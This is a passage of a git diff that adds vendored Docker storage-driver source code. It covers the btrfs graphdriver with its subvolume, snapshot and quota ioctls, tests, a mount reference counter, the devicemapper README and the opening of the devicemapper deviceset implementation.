+ _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SNAP_DESTROY, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to destroy btrfs snapshot %s for %s: %v", dirpath, name, errno.Error()) + } + return nil +} + +func subvolEnableQuota(path string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_quota_ctl_args + args.cmd = C.BTRFS_QUOTA_CTL_ENABLE + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to enable btrfs quota for %s: %v", dir, errno.Error()) + } + + return nil +} + +func subvolDisableQuota(path string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_quota_ctl_args + args.cmd = C.BTRFS_QUOTA_CTL_DISABLE + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to disable btrfs quota for %s: %v", dir, errno.Error()) + } + + return nil +} + +func subvolRescanQuota(path string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_quota_rescan_args + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_RESCAN_WAIT, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to rescan btrfs quota for %s: %v", dir, errno.Error()) + } + + return nil +} + +func subvolLimitQgroup(path string, size uint64) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_qgroup_limit_args + args.lim.max_referenced = C.__u64(size) + args.lim.flags = C.BTRFS_QGROUP_LIMIT_MAX_RFER + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), 
C.BTRFS_IOC_QGROUP_LIMIT, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to limit qgroup for %s: %v", dir, errno.Error()) + } + + return nil +} + +func (d *Driver) subvolumesDir() string { + return path.Join(d.home, "subvolumes") +} + +func (d *Driver) subvolumesDirID(id string) string { + return path.Join(d.subvolumesDir(), id) +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create the filesystem with given id. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + subvolumes := path.Join(d.home, "subvolumes") + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return err + } + if err := idtools.MkdirAllAs(subvolumes, 0700, rootUID, rootGID); err != nil { + return err + } + if parent == "" { + if err := subvolCreate(subvolumes, id); err != nil { + return err + } + } else { + parentDir := d.subvolumesDirID(parent) + st, err := os.Stat(parentDir) + if err != nil { + return err + } + if !st.IsDir() { + return fmt.Errorf("%s: not a directory", parentDir) + } + if err := subvolSnapshot(parentDir, subvolumes, id); err != nil { + return err + } + } + + var storageOpt map[string]string + if opts != nil { + storageOpt = opts.StorageOpt + } + + if _, ok := storageOpt["size"]; ok { + driver := &Driver{} + if err := d.parseStorageOpt(storageOpt, driver); err != nil { + return err + } + if err := d.setStorageSize(path.Join(subvolumes, id), driver); err != nil { + return err + } + } + + // if we have a remapped root (user namespaces enabled), change the created snapshot + // dir ownership to match + if rootUID != 0 || rootGID != 0 { + if err := os.Chown(path.Join(subvolumes, id), rootUID, rootGID); err != nil { + return err + } + } + + mountLabel := "" + if opts != nil { + mountLabel = 
opts.MountLabel + } + + return label.Relabel(path.Join(subvolumes, id), mountLabel, false) +} + +// Parse btrfs storage options +func (d *Driver) parseStorageOpt(storageOpt map[string]string, driver *Driver) error { + // Read size to change the subvolume disk quota per container + for key, val := range storageOpt { + key := strings.ToLower(key) + switch key { + case "size": + size, err := units.RAMInBytes(val) + if err != nil { + return err + } + driver.options.size = uint64(size) + default: + return fmt.Errorf("Unknown option %s", key) + } + } + + return nil +} + +// Set btrfs storage size +func (d *Driver) setStorageSize(dir string, driver *Driver) error { + if driver.options.size <= 0 { + return fmt.Errorf("btrfs: invalid storage size: %s", units.HumanSize(float64(driver.options.size))) + } + if d.options.minSpace > 0 && driver.options.size < d.options.minSpace { + return fmt.Errorf("btrfs: storage size cannot be less than %s", units.HumanSize(float64(d.options.minSpace))) + } + + if !quotaEnabled { + if err := subvolEnableQuota(d.home); err != nil { + return err + } + quotaEnabled = true + } + + if err := subvolLimitQgroup(dir, driver.options.size); err != nil { + return err + } + + return nil +} + +// Remove the filesystem with given id. +func (d *Driver) Remove(id string) error { + dir := d.subvolumesDirID(id) + if _, err := os.Stat(dir); err != nil { + return err + } + if err := subvolDelete(d.subvolumesDir(), id); err != nil { + return err + } + if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + return err + } + if err := subvolRescanQuota(d.home); err != nil { + return err + } + return nil +} + +// Get the requested filesystem id. 
+func (d *Driver) Get(id, mountLabel string) (string, error) { + dir := d.subvolumesDirID(id) + st, err := os.Stat(dir) + if err != nil { + return "", err + } + + if !st.IsDir() { + return "", fmt.Errorf("%s: not a directory", dir) + } + + return dir, nil +} + +// Put is not implemented for BTRFS as there is no cleanup required for the id. +func (d *Driver) Put(id string) error { + // Get() creates no runtime resources (like e.g. mounts) + // so this doesn't need to do anything. + return nil +} + +// Exists checks if the id exists in the filesystem. +func (d *Driver) Exists(id string) bool { + dir := d.subvolumesDirID(id) + _, err := os.Stat(dir) + return err == nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go new file mode 100644 index 0000000000..0038dbcdcd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go @@ -0,0 +1,63 @@ +// +build linux + +package btrfs + +import ( + "os" + "path" + "testing" + + "github.com/docker/docker/daemon/graphdriver/graphtest" +) + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestBtrfsSetup and TestBtrfsTeardown +func TestBtrfsSetup(t *testing.T) { + graphtest.GetDriver(t, "btrfs") +} + +func TestBtrfsCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "btrfs") +} + +func TestBtrfsCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "btrfs") +} + +func TestBtrfsCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "btrfs") +} + +func TestBtrfsSubvolDelete(t *testing.T) { + d := graphtest.GetDriver(t, "btrfs") + if err := d.CreateReadWrite("test", "", nil); err != nil { + t.Fatal(err) + } + defer graphtest.PutDriver(t) + + dir, err := d.Get("test", "") + if err != nil { + t.Fatal(err) + } + defer d.Put("test") + + if err := subvolCreate(dir, "subvoltest"); err != nil { + t.Fatal(err) + 
} + + if _, err := os.Stat(path.Join(dir, "subvoltest")); err != nil { + t.Fatal(err) + } + + if err := d.Remove("test"); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(path.Join(dir, "subvoltest")); !os.IsNotExist(err) { + t.Fatalf("expected not exist error on nested subvol, got: %v", err) + } +} + +func TestBtrfsTeardown(t *testing.T) { + graphtest.PutDriver(t) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go new file mode 100644 index 0000000000..f07088887a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go @@ -0,0 +1,3 @@ +// +build !linux !cgo + +package btrfs diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go new file mode 100644 index 0000000000..73d90cdd71 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go @@ -0,0 +1,26 @@ +// +build linux,!btrfs_noversion + +package btrfs + +/* +#include + +// around version 3.16, they did not define lib version yet +#ifndef BTRFS_LIB_VERSION +#define BTRFS_LIB_VERSION -1 +#endif + +// upstream had removed it, but now it will be coming back +#ifndef BTRFS_BUILD_VERSION +#define BTRFS_BUILD_VERSION "-" +#endif +*/ +import "C" + +func btrfsBuildVersion() string { + return string(C.BTRFS_BUILD_VERSION) +} + +func btrfsLibVersion() int { + return int(C.BTRFS_LIB_VERSION) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go new file mode 100644 index 0000000000..f802fbc629 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go @@ -0,0 +1,14 @@ +// +build linux,btrfs_noversion + +package btrfs + +// TODO(vbatts) remove this work-around once supported linux distros are 
on +// btrfs utilities of >= 3.16.1 + +func btrfsBuildVersion() string { + return "-" +} + +func btrfsLibVersion() int { + return -1 +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go new file mode 100644 index 0000000000..15a6e75cb3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go @@ -0,0 +1,13 @@ +// +build linux,!btrfs_noversion + +package btrfs + +import ( + "testing" +) + +func TestLibVersion(t *testing.T) { + if btrfsLibVersion() <= 0 { + t.Errorf("expected output from btrfs lib version > 0") + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/counter.go b/vendor/github.com/docker/docker/daemon/graphdriver/counter.go new file mode 100644 index 0000000000..5ea604f5b6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/counter.go @@ -0,0 +1,67 @@ +package graphdriver + +import "sync" + +type minfo struct { + check bool + count int +} + +// RefCounter is a generic counter for use by graphdriver Get/Put calls +type RefCounter struct { + counts map[string]*minfo + mu sync.Mutex + checker Checker +} + +// NewRefCounter returns a new RefCounter +func NewRefCounter(c Checker) *RefCounter { + return &RefCounter{ + checker: c, + counts: make(map[string]*minfo), + } +} + +// Increment increaes the ref count for the given id and returns the current count +func (c *RefCounter) Increment(path string) int { + c.mu.Lock() + m := c.counts[path] + if m == nil { + m = &minfo{} + c.counts[path] = m + } + // if we are checking this path for the first time check to make sure + // if it was already mounted on the system and make sure we have a correct ref + // count if it is mounted as it is in use. 
+ if !m.check { + m.check = true + if c.checker.IsMounted(path) { + m.count++ + } + } + m.count++ + c.mu.Unlock() + return m.count +} + +// Decrement decreases the ref count for the given id and returns the current count +func (c *RefCounter) Decrement(path string) int { + c.mu.Lock() + m := c.counts[path] + if m == nil { + m = &minfo{} + c.counts[path] = m + } + // if we are checking this path for the first time check to make sure + // if it was already mounted on the system and make sure we have a correct ref + // count if it is mounted as it is in use. + if !m.check { + m.check = true + if c.checker.IsMounted(path) { + m.count++ + } + } + m.count-- + c.mu.Unlock() + return m.count +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md new file mode 100644 index 0000000000..b23bbb107a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md @@ -0,0 +1,96 @@ +## devicemapper - a storage backend based on Device Mapper + +### Theory of operation + +The device mapper graphdriver uses the device mapper thin provisioning +module (dm-thinp) to implement CoW snapshots. The preferred model is +to have a thin pool reserved outside of Docker and passed to the +daemon via the `--storage-opt dm.thinpooldev` option. + +As a fallback if no thin pool is provided, loopback files will be +created. Loopback is very slow, but can be used without any +pre-configuration of storage. It is strongly recommended that you do +not use loopback in production. Ensure your Docker daemon has a +`--storage-opt dm.thinpooldev` argument provided. + +In loopback, a thin pool is created at `/var/lib/docker/devicemapper` +(devicemapper graph location) based on two block devices, one for +data and one for metadata. By default these block devices are created +automatically by using loopback mounts of automatically created sparse +files. 
+ +The default loopback files used are +`/var/lib/docker/devicemapper/devicemapper/data` and +`/var/lib/docker/devicemapper/devicemapper/metadata`. Additional metadata +required to map from docker entities to the corresponding devicemapper +volumes is stored in the `/var/lib/docker/devicemapper/devicemapper/json` +file (encoded as Json). + +In order to support multiple devicemapper graphs on a system, the thin +pool will be named something like: `docker-0:33-19478248-pool`, where +the `0:33` part is the minor/major device nr and `19478248` is the +inode number of the `/var/lib/docker/devicemapper` directory. + +On the thin pool, docker automatically creates a base thin device, +called something like `docker-0:33-19478248-base` of a fixed +size. This is automatically formatted with an empty filesystem on +creation. This device is the base of all docker images and +containers. All base images are snapshots of this device and those +images are then in turn used as snapshots for other images and +eventually containers. + +### Information on `docker info` + +As of docker-1.4.1, `docker info` when using the `devicemapper` storage driver +will display something like: + + $ sudo docker info + [...] + Storage Driver: devicemapper + Pool Name: docker-253:1-17538953-pool + Pool Blocksize: 65.54 kB + Base Device Size: 107.4 GB + Data file: /dev/loop4 + Metadata file: /dev/loop4 + Data Space Used: 2.536 GB + Data Space Total: 107.4 GB + Data Space Available: 104.8 GB + Metadata Space Used: 7.93 MB + Metadata Space Total: 2.147 GB + Metadata Space Available: 2.14 GB + Udev Sync Supported: true + Data loop file: /home/docker/devicemapper/devicemapper/data + Metadata loop file: /home/docker/devicemapper/devicemapper/metadata + Library Version: 1.02.82-git (2013-10-04) + [...] + +#### status items + +Each item in the indented section under `Storage Driver: devicemapper` are +status information about the driver. + * `Pool Name` name of the devicemapper pool for this driver. 
+ * `Pool Blocksize` tells the blocksize the thin pool was initialized with. This only changes on creation. + * `Base Device Size` tells the maximum size of a container and image + * `Data file` blockdevice file used for the devicemapper data + * `Metadata file` blockdevice file used for the devicemapper metadata + * `Data Space Used` tells how much of `Data file` is currently used + * `Data Space Total` tells max size the `Data file` + * `Data Space Available` tells how much free space there is in the `Data file`. If you are using a loop device this will report the actual space available to the loop device on the underlying filesystem. + * `Metadata Space Used` tells how much of `Metadata file` is currently used + * `Metadata Space Total` tells max size the `Metadata file` + * `Metadata Space Available` tells how much free space there is in the `Metadata file`. If you are using a loop device this will report the actual space available to the loop device on the underlying filesystem. + * `Udev Sync Supported` tells whether devicemapper is able to sync with Udev. Should be `true`. + * `Data loop file` file attached to `Data file`, if loopback device is used + * `Metadata loop file` file attached to `Metadata file`, if loopback device is used + * `Library Version` from the libdevmapper used + +### About the devicemapper options + +The devicemapper backend supports some options that you can specify +when starting the docker daemon using the `--storage-opt` flags. +This uses the `dm` prefix and would be used something like `docker daemon --storage-opt dm.foo=bar`. + +These options are currently documented both in [the man +page](../../../man/docker.1.md) and in [the online +documentation](https://docs.docker.com/engine/reference/commandline/dockerd/#/storage-driver-options). +If you add an options, update both the `man` page and the documentation. 
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go new file mode 100644 index 0000000000..b8e762592c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go @@ -0,0 +1,2727 @@ +// +build linux + +package devmapper + +import ( + "bufio" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/devicemapper" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/loopback" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/go-units" + + "github.com/opencontainers/runc/libcontainer/label" +) + +var ( + defaultDataLoopbackSize int64 = 100 * 1024 * 1024 * 1024 + defaultMetaDataLoopbackSize int64 = 2 * 1024 * 1024 * 1024 + defaultBaseFsSize uint64 = 10 * 1024 * 1024 * 1024 + defaultThinpBlockSize uint32 = 128 // 64K = 128 512b sectors + defaultUdevSyncOverride = false + maxDeviceID = 0xffffff // 24 bit, pool limit + deviceIDMapSz = (maxDeviceID + 1) / 8 + // We retry device removal so many a times that even error messages + // will fill up console during normal operation. So only log Fatal + // messages by default. 
+ logLevel = devicemapper.LogLevelFatal + driverDeferredRemovalSupport = false + enableDeferredRemoval = false + enableDeferredDeletion = false + userBaseSize = false + defaultMinFreeSpacePercent uint32 = 10 +) + +const deviceSetMetaFile string = "deviceset-metadata" +const transactionMetaFile string = "transaction-metadata" + +type transaction struct { + OpenTransactionID uint64 `json:"open_transaction_id"` + DeviceIDHash string `json:"device_hash"` + DeviceID int `json:"device_id"` +} + +type devInfo struct { + Hash string `json:"-"` + DeviceID int `json:"device_id"` + Size uint64 `json:"size"` + TransactionID uint64 `json:"transaction_id"` + Initialized bool `json:"initialized"` + Deleted bool `json:"deleted"` + devices *DeviceSet + + // The global DeviceSet lock guarantees that we serialize all + // the calls to libdevmapper (which is not threadsafe), but we + // sometimes release that lock while sleeping. In that case + // this per-device lock is still held, protecting against + // other accesses to the device that we're doing the wait on. + // + // WARNING: In order to avoid AB-BA deadlocks when releasing + // the global lock while holding the per-device locks all + // device locks must be acquired *before* the device lock, and + // multiple device locks should be acquired parent before child. 
+ lock sync.Mutex +} + +type metaData struct { + Devices map[string]*devInfo `json:"Devices"` +} + +// DeviceSet holds information about list of devices +type DeviceSet struct { + metaData `json:"-"` + sync.Mutex `json:"-"` // Protects all fields of DeviceSet and serializes calls into libdevmapper + root string + devicePrefix string + TransactionID uint64 `json:"-"` + NextDeviceID int `json:"next_device_id"` + deviceIDMap []byte + + // Options + dataLoopbackSize int64 + metaDataLoopbackSize int64 + baseFsSize uint64 + filesystem string + mountOptions string + mkfsArgs []string + dataDevice string // block or loop dev + dataLoopFile string // loopback file, if used + metadataDevice string // block or loop dev + metadataLoopFile string // loopback file, if used + doBlkDiscard bool + thinpBlockSize uint32 + thinPoolDevice string + transaction `json:"-"` + overrideUdevSyncCheck bool + deferredRemove bool // use deferred removal + deferredDelete bool // use deferred deletion + BaseDeviceUUID string // save UUID of base device + BaseDeviceFilesystem string // save filesystem of base device + nrDeletedDevices uint // number of deleted devices + deletionWorkerTicker *time.Ticker + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + minFreeSpacePercent uint32 //min free space percentage in thinpool + xfsNospaceRetries string // max retries when xfs receives ENOSPC +} + +// DiskUsage contains information about disk usage and is used when reporting Status of a device. +type DiskUsage struct { + // Used bytes on the disk. + Used uint64 + // Total bytes on the disk. + Total uint64 + // Available bytes on the disk. + Available uint64 +} + +// Status returns the information about the device. +type Status struct { + // PoolName is the name of the data pool. + PoolName string + // DataFile is the actual block device for data. + DataFile string + // DataLoopback loopback file, if used. + DataLoopback string + // MetadataFile is the actual block device for metadata. 
+ MetadataFile string + // MetadataLoopback is the loopback file, if used. + MetadataLoopback string + // Data is the disk used for data. + Data DiskUsage + // Metadata is the disk used for meta data. + Metadata DiskUsage + // BaseDeviceSize is base size of container and image + BaseDeviceSize uint64 + // BaseDeviceFS is backing filesystem. + BaseDeviceFS string + // SectorSize size of the vector. + SectorSize uint64 + // UdevSyncSupported is true if sync is supported. + UdevSyncSupported bool + // DeferredRemoveEnabled is true then the device is not unmounted. + DeferredRemoveEnabled bool + // True if deferred deletion is enabled. This is different from + // deferred removal. "removal" means that device mapper device is + // deactivated. Thin device is still in thin pool and can be activated + // again. But "deletion" means that thin device will be deleted from + // thin pool and it can't be activated again. + DeferredDeleteEnabled bool + DeferredDeletedDeviceCount uint + MinFreeSpace uint64 +} + +// Structure used to export image/container metadata in docker inspect. +type deviceMetadata struct { + deviceID int + deviceSize uint64 // size in bytes + deviceName string // Device name as used during activation +} + +// DevStatus returns information about device mounted containing its id, size and sector information. +type DevStatus struct { + // DeviceID is the id of the device. + DeviceID int + // Size is the size of the filesystem. + Size uint64 + // TransactionID is a unique integer per device set used to identify an operation on the file system, this number is incremental. + TransactionID uint64 + // SizeInSectors indicates the size of the sectors allocated. + SizeInSectors uint64 + // MappedSectors indicates number of mapped sectors. + MappedSectors uint64 + // HighestMappedSector is the pointer to the highest mapped sector. 
+ HighestMappedSector uint64 +} + +func getDevName(name string) string { + return "/dev/mapper/" + name +} + +func (info *devInfo) Name() string { + hash := info.Hash + if hash == "" { + hash = "base" + } + return fmt.Sprintf("%s-%s", info.devices.devicePrefix, hash) +} + +func (info *devInfo) DevName() string { + return getDevName(info.Name()) +} + +func (devices *DeviceSet) loopbackDir() string { + return path.Join(devices.root, "devicemapper") +} + +func (devices *DeviceSet) metadataDir() string { + return path.Join(devices.root, "metadata") +} + +func (devices *DeviceSet) metadataFile(info *devInfo) string { + file := info.Hash + if file == "" { + file = "base" + } + return path.Join(devices.metadataDir(), file) +} + +func (devices *DeviceSet) transactionMetaFile() string { + return path.Join(devices.metadataDir(), transactionMetaFile) +} + +func (devices *DeviceSet) deviceSetMetaFile() string { + return path.Join(devices.metadataDir(), deviceSetMetaFile) +} + +func (devices *DeviceSet) oldMetadataFile() string { + return path.Join(devices.loopbackDir(), "json") +} + +func (devices *DeviceSet) getPoolName() string { + if devices.thinPoolDevice == "" { + return devices.devicePrefix + "-pool" + } + return devices.thinPoolDevice +} + +func (devices *DeviceSet) getPoolDevName() string { + return getDevName(devices.getPoolName()) +} + +func (devices *DeviceSet) hasImage(name string) bool { + dirname := devices.loopbackDir() + filename := path.Join(dirname, name) + + _, err := os.Stat(filename) + return err == nil +} + +// ensureImage creates a sparse file of bytes at the path +// /devicemapper/. +// If the file already exists and new size is larger than its current size, it grows to the new size. +// Either way it returns the full path. 
+func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) { + dirname := devices.loopbackDir() + filename := path.Join(dirname, name) + + uid, gid, err := idtools.GetRootUIDGID(devices.uidMaps, devices.gidMaps) + if err != nil { + return "", err + } + if err := idtools.MkdirAllAs(dirname, 0700, uid, gid); err != nil && !os.IsExist(err) { + return "", err + } + + if fi, err := os.Stat(filename); err != nil { + if !os.IsNotExist(err) { + return "", err + } + logrus.Debugf("devmapper: Creating loopback file %s for device-manage use", filename) + file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0600) + if err != nil { + return "", err + } + defer file.Close() + + if err := file.Truncate(size); err != nil { + return "", err + } + } else { + if fi.Size() < size { + file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0600) + if err != nil { + return "", err + } + defer file.Close() + if err := file.Truncate(size); err != nil { + return "", fmt.Errorf("devmapper: Unable to grow loopback file %s: %v", filename, err) + } + } else if fi.Size() > size { + logrus.Warnf("devmapper: Can't shrink loopback file %s", filename) + } + } + return filename, nil +} + +func (devices *DeviceSet) allocateTransactionID() uint64 { + devices.OpenTransactionID = devices.TransactionID + 1 + return devices.OpenTransactionID +} + +func (devices *DeviceSet) updatePoolTransactionID() error { + if err := devicemapper.SetTransactionID(devices.getPoolDevName(), devices.TransactionID, devices.OpenTransactionID); err != nil { + return fmt.Errorf("devmapper: Error setting devmapper transaction ID: %s", err) + } + devices.TransactionID = devices.OpenTransactionID + return nil +} + +func (devices *DeviceSet) removeMetadata(info *devInfo) error { + if err := os.RemoveAll(devices.metadataFile(info)); err != nil { + return fmt.Errorf("devmapper: Error removing metadata file %s: %s", devices.metadataFile(info), err) + } + return nil +} + +// Given json data and file path, 
write it to disk +func (devices *DeviceSet) writeMetaFile(jsonData []byte, filePath string) error { + tmpFile, err := ioutil.TempFile(devices.metadataDir(), ".tmp") + if err != nil { + return fmt.Errorf("devmapper: Error creating metadata file: %s", err) + } + + n, err := tmpFile.Write(jsonData) + if err != nil { + return fmt.Errorf("devmapper: Error writing metadata to %s: %s", tmpFile.Name(), err) + } + if n < len(jsonData) { + return io.ErrShortWrite + } + if err := tmpFile.Sync(); err != nil { + return fmt.Errorf("devmapper: Error syncing metadata file %s: %s", tmpFile.Name(), err) + } + if err := tmpFile.Close(); err != nil { + return fmt.Errorf("devmapper: Error closing metadata file %s: %s", tmpFile.Name(), err) + } + if err := os.Rename(tmpFile.Name(), filePath); err != nil { + return fmt.Errorf("devmapper: Error committing metadata file %s: %s", tmpFile.Name(), err) + } + + return nil +} + +func (devices *DeviceSet) saveMetadata(info *devInfo) error { + jsonData, err := json.Marshal(info) + if err != nil { + return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err) + } + if err := devices.writeMetaFile(jsonData, devices.metadataFile(info)); err != nil { + return err + } + return nil +} + +func (devices *DeviceSet) markDeviceIDUsed(deviceID int) { + var mask byte + i := deviceID % 8 + mask = 1 << uint(i) + devices.deviceIDMap[deviceID/8] = devices.deviceIDMap[deviceID/8] | mask +} + +func (devices *DeviceSet) markDeviceIDFree(deviceID int) { + var mask byte + i := deviceID % 8 + mask = ^(1 << uint(i)) + devices.deviceIDMap[deviceID/8] = devices.deviceIDMap[deviceID/8] & mask +} + +func (devices *DeviceSet) isDeviceIDFree(deviceID int) bool { + var mask byte + i := deviceID % 8 + mask = (1 << uint(i)) + if (devices.deviceIDMap[deviceID/8] & mask) != 0 { + return false + } + return true +} + +// Should be called with devices.Lock() held. 
+func (devices *DeviceSet) lookupDevice(hash string) (*devInfo, error) { + info := devices.Devices[hash] + if info == nil { + info = devices.loadMetadata(hash) + if info == nil { + return nil, fmt.Errorf("devmapper: Unknown device %s", hash) + } + + devices.Devices[hash] = info + } + return info, nil +} + +func (devices *DeviceSet) lookupDeviceWithLock(hash string) (*devInfo, error) { + devices.Lock() + defer devices.Unlock() + info, err := devices.lookupDevice(hash) + return info, err +} + +// This function relies on that device hash map has been loaded in advance. +// Should be called with devices.Lock() held. +func (devices *DeviceSet) constructDeviceIDMap() { + logrus.Debug("devmapper: constructDeviceIDMap()") + defer logrus.Debug("devmapper: constructDeviceIDMap() END") + + for _, info := range devices.Devices { + devices.markDeviceIDUsed(info.DeviceID) + logrus.Debugf("devmapper: Added deviceId=%d to DeviceIdMap", info.DeviceID) + } +} + +func (devices *DeviceSet) deviceFileWalkFunction(path string, finfo os.FileInfo) error { + + // Skip some of the meta files which are not device files. + if strings.HasSuffix(finfo.Name(), ".migrated") { + logrus.Debugf("devmapper: Skipping file %s", path) + return nil + } + + if strings.HasPrefix(finfo.Name(), ".") { + logrus.Debugf("devmapper: Skipping file %s", path) + return nil + } + + if finfo.Name() == deviceSetMetaFile { + logrus.Debugf("devmapper: Skipping file %s", path) + return nil + } + + if finfo.Name() == transactionMetaFile { + logrus.Debugf("devmapper: Skipping file %s", path) + return nil + } + + logrus.Debugf("devmapper: Loading data for file %s", path) + + hash := finfo.Name() + if hash == "base" { + hash = "" + } + + // Include deleted devices also as cleanup delete device logic + // will go through it and see if there are any deleted devices. 
+ if _, err := devices.lookupDevice(hash); err != nil { + return fmt.Errorf("devmapper: Error looking up device %s:%v", hash, err) + } + + return nil +} + +func (devices *DeviceSet) loadDeviceFilesOnStart() error { + logrus.Debug("devmapper: loadDeviceFilesOnStart()") + defer logrus.Debug("devmapper: loadDeviceFilesOnStart() END") + + var scan = func(path string, info os.FileInfo, err error) error { + if err != nil { + logrus.Debugf("devmapper: Can't walk the file %s", path) + return nil + } + + // Skip any directories + if info.IsDir() { + return nil + } + + return devices.deviceFileWalkFunction(path, info) + } + + return filepath.Walk(devices.metadataDir(), scan) +} + +// Should be called with devices.Lock() held. +func (devices *DeviceSet) unregisterDevice(id int, hash string) error { + logrus.Debugf("devmapper: unregisterDevice(%v, %v)", id, hash) + info := &devInfo{ + Hash: hash, + DeviceID: id, + } + + delete(devices.Devices, hash) + + if err := devices.removeMetadata(info); err != nil { + logrus.Debugf("devmapper: Error removing metadata: %s", err) + return err + } + + return nil +} + +// Should be called with devices.Lock() held. 
+func (devices *DeviceSet) registerDevice(id int, hash string, size uint64, transactionID uint64) (*devInfo, error) { + logrus.Debugf("devmapper: registerDevice(%v, %v)", id, hash) + info := &devInfo{ + Hash: hash, + DeviceID: id, + Size: size, + TransactionID: transactionID, + Initialized: false, + devices: devices, + } + + devices.Devices[hash] = info + + if err := devices.saveMetadata(info); err != nil { + // Try to remove unused device + delete(devices.Devices, hash) + return nil, err + } + + return info, nil +} + +func (devices *DeviceSet) activateDeviceIfNeeded(info *devInfo, ignoreDeleted bool) error { + logrus.Debugf("devmapper: activateDeviceIfNeeded(%v)", info.Hash) + + if info.Deleted && !ignoreDeleted { + return fmt.Errorf("devmapper: Can't activate device %v as it is marked for deletion", info.Hash) + } + + // Make sure deferred removal on device is canceled, if one was + // scheduled. + if err := devices.cancelDeferredRemovalIfNeeded(info); err != nil { + return fmt.Errorf("devmapper: Device Deferred Removal Cancellation Failed: %s", err) + } + + if devinfo, _ := devicemapper.GetInfo(info.Name()); devinfo != nil && devinfo.Exists != 0 { + return nil + } + + return devicemapper.ActivateDevice(devices.getPoolDevName(), info.Name(), info.DeviceID, info.Size) +} + +// Return true only if kernel supports xfs and mkfs.xfs is available +func xfsSupported() bool { + // Make sure mkfs.xfs is available + if _, err := exec.LookPath("mkfs.xfs"); err != nil { + return false + } + + // Check if kernel supports xfs filesystem or not. 
